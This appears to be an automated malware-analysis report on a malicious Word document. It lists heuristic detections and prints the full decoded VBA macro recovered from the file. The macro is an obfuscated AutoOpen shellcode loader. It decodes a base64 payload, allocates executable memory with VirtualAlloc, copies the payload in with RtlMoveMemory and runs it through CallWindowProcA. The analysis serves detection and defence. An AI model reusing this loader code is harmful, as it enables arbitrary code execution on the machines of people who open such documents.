MALICIOUS
210
Risk Score
Heuristics 8
-
Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADERRaw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA native-memory callback shellcode loader critical OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADERVBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.Matched line in script
Private Declare PtrSafe Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
ole_raw_native_loader_00_plain-b64.bin |
ole-raw-native-loader-blob | raw OLE/VBA native-memory callback loader decoded from printable run at offset 0x4C824 using plain-b64 | 3220 bytes |
SHA-256: 9dc229b494a1009122822f3cd340cefa5269800942410cca38156271c25dab5e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS
|
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7172 bytes |
SHA-256: 85a89eeaa55fba6fc0c121551ac4291811090f38d2d9db944221d82f4d7a2b0a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function outlier Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
Private Declare PtrSafe Sub cully Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
Private Declare PtrSafe Function impedition Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
Private Declare PtrSafe Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr
Private Declare PtrSafe Function vespucci Lib "user32" Alias "GetDlgItem" (ByVal hDlg As LongPtr, nIDDlgItem As LongPtr) As LongPtr
Private Declare PtrSafe Function nutbrown Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr
Private Declare PtrSafe Function foi Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr
#Else
Private Declare Function careerist Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long
Private Declare Function compositor Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
Private Declare Sub cully Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function nutbrown Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long
Private Declare Function overconfident Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long
Private Declare Function churchgoing Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function dracaena Lib "user32" Alias "GetDlgItem" (ByVal hDlg As Long, nIDDlgItem As Long) As Long
#End If
Sub PasteMethod()
Dim MyRange As Object
Set MyRange = Selection.Range
' Selection Example:
Selection.Paste
' Range Example:
MyRange.Collapse Direction:=wdCollapseStart
MyRange.Paste
End Sub
Sub endodontic()
Dim oncologist As Byte
Dim buttery As String
cymatiidae = ditto.resent
boredom = balsaminaceae(cymatiidae)
schomburgkia = 42 + 119 - 158
Select Case schomburgkia
Case 1 To 12
amicability = "limonite"
Case 13
asexual = unforethoughtful
Case 16
disincline = UCase("am") + Left("phipbinaurally", 4) + Right("cowherbrion", 4)
penury = "epanchement"
End Select
maple = Mid("okaprearteriectasis", 4, 3) + "visio" + Left("ncarousel", 1)
#If Win64 Then
Dim breakfast As LongPtr
#Else
Dim breakfast As Long
#End If
engrossed = 0
breakfast = churchgoing(engrossed, 4672, &H1000, &H40)
bolometer = "disoblige"
cosmetician = "impassive"
Dim unblanched As String
imbroglio = LCase("GA") + Mid("airstreamthergoldenrod", 10, 4) + Left("umteat", 2)
parting = "hreath"
unblanched = ActiveDocument.FullName
topspin = 26 - 23
Select Case topspin
Case 1 To 10
acromegalic = "brae"
orangeman = "kindling"
Case 11
unforethoughtful = "captivation"
Case 15
rigveda = "alectoria"
elecampane = "mildly"
End Select
Dim licitness() As Byte
licitness = boredom
armenian = "modernism"
cully ByVal breakfast, licitness(0), UBound(licitness) + 1
millenarianism = "shank"
#If Win64 Then
Dim machmeter As Byte
foliaceous = "granular"
preparing = Left("schofriends", 4) & "mburgk" & Right("greenhouseia", 2)
canthus = 576
#ElseIf Win32 Then
canthus = 2214
#End If
Dim aboveboard As Integer
Dim libertas As Variant
ancohuma = nutbrown(ByVal breakfast + canthus, unblanched, 0, 0, 0)
For authoritative = 0 To 58
nitromuriatic = 58
unforethoughtful = asexual
muros = Mid("contrarietypliargentine", 12, 3) + UCase("AbLeN") + "ess"
muros = "na" + Left("mekomaple", 4)
Next authoritative
End Sub
Function balsaminaceae(improvisatore) As String
unforethoughtful = "rotatable"
Dim opinionativeness As Long
Dim lexis(63) As Long
Dim formerly As Long
Dim dispensary(255) As Byte
Dim physic(63) As Long
Dim ireful As String
belie = orchid * 3
Dim abnaki(63) As Long
Dim absorbent() As Byte
Dim medeival As Long
Dim apophysis() As Byte
Dim methodize As Long
Dim imbibition As Integer
jokingly = 255
transmutation = 256
pelargonium = 6 + 7 + 65267
villanous = 63
modifier = 99 - 34 + 262079
aggressive = 15 + 16711665
ecumenic = 56 - 30 + 65510
sarawakian = 121 + 3911
brushy = 258048
burrawong = 4096
ingenuity = 64
pestilent = 111 - 54 + 127 + 16514888
Dim boone As Variant
Dim breachloader() As Byte
ReDim breachloader(Len(improvisatore) - 1)
For i = 1 To Len(improvisatore)
breachloader(i - 1) = CByte(Asc(Mid(improvisatore, i, 1)))
Next
Dim iguanidae As Variant
For canvass = 5 To 76
aureole = 76
asexual = "scurry"
incredulity = StrReverse("ednu") + "rstandi" + Mid("autocraticalngimitation", 13, 2)
incredulity = Left("penconjunction", 3) + "uriously"
Next canvass
imbibition = 0
encyclic = 6 - 110 - 61 + 287
deuteromycetes = 51 - 17 + 221
For formerly = 0 To deuteromycetes
Select Case formerly
Case 65 To 90
dispensary(formerly) = formerly - 65
Case 97 To encyclic
dispensary(formerly) = formerly - 71
Case 48 To 57
dispensary(formerly) = formerly + 4
Case 43
dispensary(formerly) = 62
Case 47
dispensary(formerly) = 63
End Select
Next formerly
For formerly = 0 To 63
lexis(formerly) = formerly * ingenuity
abnaki(formerly) = formerly * burrawong
physic(formerly) = formerly * modifier
Next formerly
apophysis = breachloader
fleissig = 4
ReDim absorbent((((UBound(apophysis) + 1) \ fleissig) * 3) - 1)
For medeival = 0 To UBound(apophysis) Step 4
uncompact = apophysis(medeival)
axle = 42 - 118 + 79
methodize = physic(dispensary(uncompact)) + abnaki(dispensary(apophysis(medeival + 1))) + _
lexis(dispensary(apophysis(medeival + 2))) + dispensary(apophysis(medeival + axle))
formerly = methodize And aggressive
absorbent(opinionativeness) = formerly \ ecumenic
formerly = methodize And pelargonium
absorbent(opinionativeness + 1) = formerly \ transmutation
absorbent(opinionativeness + 2) = methodize And jokingly
opinionativeness = opinionativeness + 3
Next medeival
balsaminaceae = absorbent
End Function
Sub AutoOpen()
#If Win64 Then
endodontic
#ElseIf Win32 Then
arsenal = "para"
santolina = "signora"
endodontic
#Else
#End If
End Sub
Attribute VB_Name = "ditto"
Attribute VB_Base = "0{0E8A8499-08FE-4B0A-8349-0F61D60FAD42}{EAB8A922-E161-421C-B743-D76AA9F451C4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.